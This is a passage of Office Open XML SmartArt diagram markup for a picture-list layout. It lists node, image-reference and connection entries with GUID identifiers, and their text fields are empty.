    <dgm:pt modelId="{783292AF-9014-4A62-BBC8-878DC49AB5A4}" type="pres">
      <dgm:prSet presAssocID="{E7B236BC-B794-4D90-A882-86A8AF33D287}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3458FFEA-CD50-41B4-B19E-CC7F2015FCCE}" type="pres">
      <dgm:prSet presAssocID="{E7B236BC-B794-4D90-A882-86A8AF33D287}" presName="pictRect" presStyleLbl="node1" presStyleIdx="11" presStyleCnt="22"/>
      <dgm:spPr>
        <a:blipFill rotWithShape="0">
          <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId12"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </a:blipFill>
      </dgm:spPr>
    </dgm:pt>
    <dgm:pt modelId="{FBAB4971-5511-4168-BBFA-AEF9A99E4E53}" type="pres">
      <dgm:prSet presAssocID="{E7B236BC-B794-4D90-A882-86A8AF33D287}" presName="textRect" presStyleLbl="revTx" presStyleIdx="11" presStyleCnt="22">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A69A5D7C-1710-4005-AC40-061B0FBB7018}" type="pres">
      <dgm:prSet presAssocID="{9FAB8FA6-E25B-45F1-B354-12F076C389A0}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="0" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{14117221-029D-4984-A0EF-1D1B677C2796}" type="pres">
      <dgm:prSet presAssocID="{01047C79-1121-489F-A746-5B7F85773AF5}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{33B7B567-AD68-4053-AC4C-521BE9AE298D}" type="pres">
      <dgm:prSet presAssocID="{01047C79-1121-489F-A746-5B7F85773AF5}" presName="pictRect" presStyleLbl="node1" presStyleIdx="12" presStyleCnt="22"/>
      <dgm:spPr>
        <a:blipFill rotWithShape="0">
          <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId13"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </a:blipFill>
      </dgm:spPr>
    </dgm:pt>
    <dgm:pt modelId="{DEACF5C5-D089-4D99-BE01-6CC999C42E08}" type="pres">
      <dgm:prSet presAssocID="{01047C79-1121-489F-A746-5B7F85773AF5}" presName="textRect" presStyleLbl="revTx" presStyleIdx="12" presStyleCnt="22">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{13583DCE-8B98-4F38-8BF9-9DB381B09DDA}" type="pres">
      <dgm:prSet presAssocID="{2CDF00D0-69B0-475F-AA94-23D6D76155AA}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="0" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{15772C10-B32F-4790-8D43-6E3C4CBAB5BD}" type="pres">
      <dgm:prSet presAssocID="{401508D2-1EEC-4854-AFE4-45F7FFD9B5E2}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{BE49EF2D-5BAE-4242-9B64-5F6C4A850C33}" type="pres">
      <dgm:prSet presAssocID="{401508D2-1EEC-4854-AFE4-45F7FFD9B5E2}" presName="pictRect" presStyleLbl="node1" presStyleIdx="13" presStyleCnt="22"/>
      <dgm:spPr>
        <a:blipFill rotWithShape="0">
          <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId14"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </a:blipFill>
      </dgm:spPr>
    </dgm:pt>
    <dgm:pt modelId="{1C22FC41-245F-4D43-9573-5DF0CE1F4037}" type="pres">
      <dgm:prSet presAssocID="{401508D2-1EEC-4854-AFE4-45F7FFD9B5E2}" presName="textRect" presStyleLbl="revTx" presStyleIdx="13" presStyleCnt="22">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3E8D6751-BD6D-493D-9CE5-50F1F255EBE0}" type="pres">
      <dgm:prSet presAssocID="{6C378B84-21E4-405A-80F8-A7AAA86F5C54}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="0" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E6A202E4-C0FE-4580-A06C-51C4897A1D87}" type="pres">
      <dgm:prSet presAssocID="{B8676357-B10F-4249-BAB2-D2A4DA079CDA}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{FCED3C3B-B692-40D6-B5C8-754EFF4FB010}" type="pres">
      <dgm:prSet presAssocID="{B8676357-B10F-4249-BAB2-D2A4DA079CDA}" presName="pictRect" presStyleLbl="node1" presStyleIdx="14" presStyleCnt="22"/>
      <dgm:spPr>
        <a:blipFill rotWithShape="0">
          <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId15"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </a:blipFill>
      </dgm:spPr>
    </dgm:pt>
    <dgm:pt modelId="{2C96D9FF-9362-433E-8DE7-9631A038E706}" type="pres">
      <dgm:prSet presAssocID="{B8676357-B10F-4249-BAB2-D2A4DA079CDA}" presName="textRect" presStyleLbl="revTx" presStyleIdx="14" presStyleCnt="22">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D41F6C95-E709-413D-8BA7-23C575DD7B97}" type="pres">
      <dgm:prSet presAssocID="{E9945E62-5663-4796-9279-1B5E505C63E3}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="0" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{36DCA552-4D08-480C-B302-7E134B26425B}" type="pres">
      <dgm:prSet presAssocID="{E6F41214-1A9C-41F0-AEE0-40DA156E0BD7}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{99DE3C50-97E1-44F5-BD9A-09F302A7FFB8}" type="pres">
      <dgm:prSet presAssocID="{E6F41214-1A9C-41F0-AEE0-40DA156E0BD7}" presName="pictRect" presStyleLbl="node1" presStyleIdx="15" presStyleCnt="22"/>
      <dgm:spPr>
        <a:blipFill rotWithShape="0">
          <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId16"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </a:blipFill>
      </dgm:spPr>
    </dgm:pt>
    <dgm:pt modelId="{C50B5B03-FFB4-4849-AD47-BF1375281454}" type="pres">
      <dgm:prSet presAssocID="{E6F41214-1A9C-41F0-AEE0-40DA156E0BD7}" presName="textRect" presStyleLbl="revTx" presStyleIdx="15" presStyleCnt="22">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B310CD6E-22BA-461C-9891-669AB207A9CD}" type="pres">
      <dgm:prSet presAssocID="{37AB3121-8874-4DF0-82C2-A88A09059BB6}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="0" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A072B642-F86D-4A06-8F72-29643ED4E783}" type="pres">
      <dgm:prSet presAssocID="{BC5E4A6A-F7E0-47AE-A59B-DED1DA8DDFDA}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B47C8FBE-8F95-46F4-B293-20B926AAC3A8}" type="pres">
      <dgm:prSet presAssocID="{BC5E4A6A-F7E0-47AE-A59B-DED1DA8DDFDA}" presName="pictRect" presStyleLbl="node1" presStyleIdx="16" presStyleCnt="22"/>
      <dgm:spPr>
        <a:blipFill rotWithShape="0">
          <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId17"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </a:blipFill>
      </dgm:spPr>
    </dgm:pt>
    <dgm:pt modelId="{59115EBC-E00B-4E8C-8325-159702624E53}" type="pres">
      <dgm:prSet presAssocID="{BC5E4A6A-F7E0-47AE-A59B-DED1DA8DDFDA}" presName="textRect" presStyleLbl="revTx" presStyleIdx="16" presStyleCnt="22">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6ABD193F-9DDA-4538-9261-29DE8DAEE703}" type="pres">
      <dgm:prSet presAssocID="{452F1B89-BAAD-41CB-8C24-50E4E42FC03E}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="0" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FE7CAE52-B60E-410F-B3A9-F32742BA05B0}" type="pres">
      <dgm:prSet presAssocID="{B26A55BC-00BB-43C3-A088-AF23A6A1D7B2}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{22B78B36-C024-49A1-9C8E-01EB114322B6}" type="pres">
      <dgm:prSet presAssocID="{B26A55BC-00BB-43C3-A088-AF23A6A1D7B2}" presName="pictRect" presStyleLbl="node1" presStyleIdx="17" presStyleCnt="22"/>
      <dgm:spPr>
        <a:blipFill rotWithShape="0">
          <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId18"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </a:blipFill>
      </dgm:spPr>
    </dgm:pt>
    <dgm:pt modelId="{138B6328-E8B0-4B36-AD2E-744E6E96CB78}" type="pres">
      <dgm:prSet presAssocID="{B26A55BC-00BB-43C3-A088-AF23A6A1D7B2}" presName="textRect" presStyleLbl="revTx" presStyleIdx="17" presStyleCnt="22">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FCE5B802-EB8E-40FB-A4BE-D94239938E65}" type="pres">
      <dgm:prSet presAssocID="{25DE0E6A-17A4-4CB5-9F73-3BB9D3236754}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="0" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0DE4B25A-43A5-447E-8C00-961E77F649D7}" type="pres">
      <dgm:prSet presAssocID="{74F9B7B6-6CDB-4C72-BCFB-3F421429F32D}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{0F0AEB94-8C0B-4BFD-8D19-E323AFA5101B}" type="pres">
      <dgm:prSet presAssocID="{74F9B7B6-6CDB-4C72-BCFB-3F421429F32D}" presName="pictRect" presStyleLbl="node1" presStyleIdx="18" presStyleCnt="22"/>
      <dgm:spPr>
        <a:blipFill rotWithShape="0">
          <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId19"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </a:blipFill>
      </dgm:spPr>
    </dgm:pt>
    <dgm:pt modelId="{A010984D-4B1A-40EB-97BE-95AAD11F6E41}" type="pres">
      <dgm:prSet presAssocID="{74F9B7B6-6CDB-4C72-BCFB-3F421429F32D}" presName="textRect" presStyleLbl="revTx" presStyleIdx="18" presStyleCnt="22">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E048E36F-690C-4B6D-8624-9BC29EABB9AA}" type="pres">
      <dgm:prSet presAssocID="{E844B599-F40D-496C-ABA5-A4089D2E19A4}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="0" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8F1CE538-663D-48EB-B83E-414C82770312}" type="pres">
      <dgm:prSet presAssocID="{AD758683-FE41-43B0-943E-11555910705C}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{DB2C5316-CD6C-44F4-991D-0DCFD2FC4A94}" type="pres">
      <dgm:prSet presAssocID="{AD758683-FE41-43B0-943E-11555910705C}" presName="pictRect" presStyleLbl="node1" presStyleIdx="19" presStyleCnt="22"/>
      <dgm:spPr>
        <a:blipFill rotWithShape="0">
          <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId20"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </a:blipFill>
      </dgm:spPr>
    </dgm:pt>
    <dgm:pt modelId="{DB8A065E-62C9-40D4-B48E-4EF875F2A0C4}" type="pres">
      <dgm:prSet presAssocID="{AD758683-FE41-43B0-943E-11555910705C}" presName="textRect" presStyleLbl="revTx" presStyleIdx="19" presStyleCnt="22">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BE402A1F-C027-4B00-B3CE-C89B05D5D885}" type="pres">
      <dgm:prSet presAssocID="{6086B907-0DE7-4C19-84EA-10A195D72CEF}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="0" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D41BFA88-C817-418D-A8D0-BCD4FB3A6BB2}" type="pres">
      <dgm:prSet presAssocID="{7911FB20-3B48-4AC7-A5CE-2F8E2C307916}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{7E8157B3-D520-4028-8754-5BE654019855}" type="pres">
      <dgm:prSet presAssocID="{7911FB20-3B48-4AC7-A5CE-2F8E2C307916}" presName="pictRect" presStyleLbl="node1" presStyleIdx="20" presStyleCnt="22"/>
      <dgm:spPr>
        <a:blipFill rotWithShape="0">
          <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId21"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </a:blipFill>
      </dgm:spPr>
    </dgm:pt>
    <dgm:pt modelId="{DD4C1E79-8A0E-4218-A50D-77E141A90E6E}" type="pres">
      <dgm:prSet presAssocID="{7911FB20-3B48-4AC7-A5CE-2F8E2C307916}" presName="textRect" presStyleLbl="revTx" presStyleIdx="20" presStyleCnt="22">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5F26ED35-361E-4A66-BDF6-FDF86C0511C4}" type="pres">
      <dgm:prSet presAssocID="{8EE78002-CC4F-4639-966D-422B14CF5CE2}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="0" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BC3E2ECB-543B-43A4-ACC4-1652B67DA38E}" type="pres">
      <dgm:prSet presAssocID="{9EC999C4-DB80-43DB-BFD1-52EBB5F05FF5}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F9F8E482-7DA1-4191-A748-B1C924B9A687}" type="pres">
      <dgm:prSet presAssocID="{9EC999C4-DB80-43DB-BFD1-52EBB5F05FF5}" presName="pictRect" presStyleLbl="node1" presStyleIdx="21" presStyleCnt="22"/>
      <dgm:spPr>
        <a:blipFill rotWithShape="0">
          <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId22"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </a:blipFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{27F9C8D5-820C-43B5-A953-ABA1F58CC315}" type="pres">
      <dgm:prSet presAssocID="{9EC999C4-DB80-43DB-BFD1-52EBB5F05FF5}" presName="textRect" presStyleLbl="revTx" presStyleIdx="21" presStyleCnt="22">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{ED6D8298-FD0F-41ED-85DF-6A61065730C1}" srcId="{5F9C5912-42CD-4625-9755-D3B8FD635E22}" destId="{4C043118-3FFC-4561-ABDB-394C2E6D2EE1}" srcOrd="2" destOrd="0" parTransId="{592A27B8-87DD-462B-AE16-B9607F92BD08}" sibTransId="{E42098A2-EADA-4E78-929E-DC0C8CE0757F}"/>
    <dgm:cxn modelId="{B054EC09-F184-4149-B12C-A0D4DDA6676A}" srcId="{5F9C5912-42CD-4625-9755-D3B8FD635E22}" destId="{AD758683-FE41-43B0-943E-11555910705C}" srcOrd="19" destOrd="0" parTransId="{11810766-9540-4779-86CA-0180A3CFB95A}" sibTransId="{6086B907-0DE7-4C19-84EA-10A195D72CEF}"/>
    <dgm:cxn modelId="{7823C8B6-5E7A-431A-BAB3-B9C2D06DA526}" type="presOf" srcId="{98AE27B2-1399-482C-AA42-384B5CB37CD1}" destId="{BAE70887-5032-4496-883A-3CA18CBB7E5E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pList1#1"/>
    <dgm:cxn modelId="{760CE729-10F6-48FC-ACEE-AA32AC154E05}" srcId="{5F9C5912-42CD-4625-9755-D3B8FD635E22}" destId="{BC5E4A6A-F7E0-47AE-A59B-DED1DA8DDFDA}" srcOrd="16" destOrd="0" parTransId="{69F0ABE4-D077-40A4-A0BF-8F2F859C2E74}" sibTransId="{452F1B89-BAAD-41CB-8C24-50E4E42FC03E}"/>
    <dgm:cxn modelId="{DD626921-5880-499A-96B9-2262B1F5ECC6}" type="presOf" srcId="{01047C79-1121-489F-A746-5B7F85773AF5}" destId="{DEACF5C5-D089-4D99-BE01-6CC999C42E08}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pList1#1"/>
    <dgm:cxn modelId="{31F204DF-0FDA-4E16-AAA2-7588F0624CCC}" type="presOf" srcId="{E844B599-F40D-496C-ABA5-A4089D2E19A4}" destId="{E048E36F-690C-4B6D-8624-9BC29EABB9AA}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pList1#1"/>
    <dgm:cxn modelId="{0D87FFB7-6C31-4FCA-A92A-0CF5E4985D6D}" type="presOf" srcId="{9EC999C4-DB80-43DB-BFD1-52EBB5F05FF5}" destId="{27F9C8D5-820C-43B5-A953-ABA1F58CC315}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pList1#1"/>
    <dgm:cxn modelId="{F2724972-5068-489B-972E-68493D6F58A1}" type="presOf" srcId="{8EE78002-CC4F-4639-966D-422B14CF5CE2}" destId="{5F26ED35-361E-4A66-BDF6-FDF86C0511C4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pList1#1"/>
    <dgm:cxn modelId="{0DE2AF23-5EF4-4BB5-AE81-D195A9FD3782}" type="presOf" srcId="{2CDF00D0-69B0-475F-AA94-23D6D76155AA}" destId="{13583DCE-8B98-4F38-8BF9-9DB381B09DDA}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pList1#1"/>
    <dgm:cxn modelId="{F959FAE0-94D9-4CBA-B33F-178D36746DAC}" srcId="{5F9C5912-42CD-4625-9755-D3B8FD635E22}" destId="{9584D754-28D6-4FDA-ADF3-CA332D8340FB}" srcOrd="9" destOrd="0" parTransId="{6D7BD32B-3E1E-49A8-9D2E-28EAFE5E3CDB}" sibTransId="{C4BF8CBA-1A3F-41B3-9E8D-0AFD5F2FEAB1}"/>
    <dgm:cxn modelId="{2BC2F289-65BC-4BB3-AE29-129DF513E2A4}" type="presOf" srcId="{58D488A8-CFCF-4486-BDF8-D94A8FD936D5}" destId="{D0E14DE4-FB82-4809-90AD-270F00A25CBF}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pList1#1"/>
    <dgm:cxn modelId="{3501F450-3A93-445E-8EEA-42DB1A1B4786}" type="presOf" srcId="{E42098A2-EADA-4E78-929E-DC0C8CE0757F}" destId="{D90D3C31-58CA-46AB-918B-A47AD2026F07}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pList1#1"/>
    <dgm:cxn modelId="{4D05FF0E-E3B1-444E-A32A-B6057443940B}" srcId="{5F9C5912-42CD-4625-9755-D3B8FD635E22}" destId="{B8676357-B10F-4249-BAB2-D2A4DA079CDA}" srcOrd="14" destOrd="0" parTransId="{3778B750-BEEF-4862-8EE9-3B7DF9401DF4}" sibTransId="{E9945E62-5663-4796-9279-1B5E505C63E3}"/>
    <dgm:cxn modelId="{9F281564-17DC-4321-A7AB-3DD32E8234AF}" type="presOf" srcId="{0899F5CA-668C-44CC-9ED2-0612BBC18D2D}" destId="{47403984-B2C0-489B-AFF6-1747887610DA}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pList1#1"/>
    <dgm:cxn modelId="{A3B47E32-CE5A-4E2C-B97B-F42F376B1AD3}" type="presOf" srcId="{6086B907-0DE7-4C19-84EA-10A195D72CEF}" destId="{BE402A1F-C027-4B00-B3CE-C89B05D5D885}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pList1#1"/>
    <dgm:cxn modelId="{4D39CDF2-BB8E-4A52-A9EE-9A1148A6879D}" srcId="{5F9C5912-42CD-4625-9755-D3B8FD635E22}" destId="{60AB827D-5295-4177-BF64-99000A240B5F}" srcOrd="7" destOrd="0" parTransId="{4823A2E2-B52B-4D74-8692-46899E042B65}" sibTransId="{36F281B0-F791-4991-8164-D7924CBABE59}"/>
    <dgm:cxn modelId="{C2950C46-7C5A-461A-A133-261C95D40FB9}" type="presOf" srcId="{401508D2-1EEC-4854-AFE4-45F7FFD9B5E2}" destId="{1C22FC41-245F-4D43-9573-5DF0CE1F4037}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pList1#1"/>
    <dgm:cxn modelId="{AC48F766-336C-42A1-96F8-D88BAF8D5E8F}" type="presOf" srcId="{DA02151B-CCF0-4D5A-8CED-76CEC1D064DB}" destId="{648AB171-FA8A-4AE8-B132-3D7AB46EEC56}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pList1#1"/>
    <dgm:cxn modelId="{0E7A13BA-AA14-4056-A61A-5FEF6EDE8B54}" type="presOf" srcId="{E6F41214-1A9C-41F0-AEE0-40DA156E0BD7}" destId="{C50B5B03-FFB4-4849-AD47-BF1375281454}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pList1#1"/>
    <dgm:cxn modelId="{01EC9A30-CB3D-4909-973E-248CACE07121}" type="presOf" srcId="{9275E04B-F0EC-4EC9-9417-C462CC072C77}" destId="{FC18F91E-B9E0-4E6D-80D2-6952FDA68C9C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pList1#1"/>
    <dgm:cxn modelId="{C5FDC5F0-63E4-4BE9-8409-CC59A98EA0D3}" type="presOf" srcId="{E7B236BC-B794-4D90-A882-86A8AF33D287}" destId="{FBAB4971-5511-4168-BBFA-AEF9A99E4E53}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pList1#1"/>
    <dgm:cxn modelId="{DF90AC0D-CB5D-4CAF-AA6C-228DDACA05B2}" type="presOf" srcId="{A022C8A3-3CCF-4507-9EE2-CE4C920B434A}" destId="{1C072A7D-089D-425E-B90E-D8D0017C814D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pList1#1"/>
    <dgm:cxn modelId="{7959527E-7F8C-4321-9B33-31D148BA6E4B}" type="presOf" srcId="{D571FBA1-C111-487D-A1CC-3ABA9B62D5B9}" destId="{CAE4AF96-B854-40BF-8F2D-625D902FFDB3}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pList1#1"/>
    <dgm:cxn modelId="{6491CEE5-4D45-423D-B129-D5D2E506F5CA}" srcId="{5F9C5912-42CD-4625-9755-D3B8FD635E22}" destId="{1A1B9150-FB99-4D58-9C04-298871F8F847}" srcOrd="1" destOrd="0" parTransId="{E80AB93E-F4BA-4666-8233-282B3100712D}" sibTransId="{4E869DAF-8703-4C25-94D3-0930A9794A7E}"/>
    <dgm:cxn modelId="{3E6463AE-48AE-4848-A0A3-1063BD0C847D}" type="presOf" srcId="{4E869DAF-8703-4C25-94D3-0930A9794A7E}" destId="{EED40010-D4F0-48B6-BC8D-BE21B585AFAC}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/pList1#1"/>
    <dgm:cxn modelId="{D4DDC44D-F78B-469A-9921-4D79CA47E46C}" srcId="{5F9C5912-42CD-4625-9755-D3B8FD635E22}" destId="{401508D2-1EEC-4854-AFE4-45F7FFD9B5E2}" srcOrd="13" destOrd="0" parTransId="{6EC291F3-4AE7-4BAF-BC6A-4C12272BD5E0}" sibTransId="{6C378B84-21E4-405A-80F8-A7AAA86F5C54}"/>
